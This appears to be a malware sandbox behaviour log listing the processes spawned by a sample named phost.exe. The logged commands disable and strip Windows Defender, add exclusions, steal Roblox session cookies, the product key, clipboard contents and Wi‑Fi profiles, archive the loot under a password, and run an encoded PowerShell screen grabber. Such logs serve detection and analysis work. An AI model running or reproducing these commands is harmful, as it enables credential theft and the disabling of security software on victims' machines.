              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
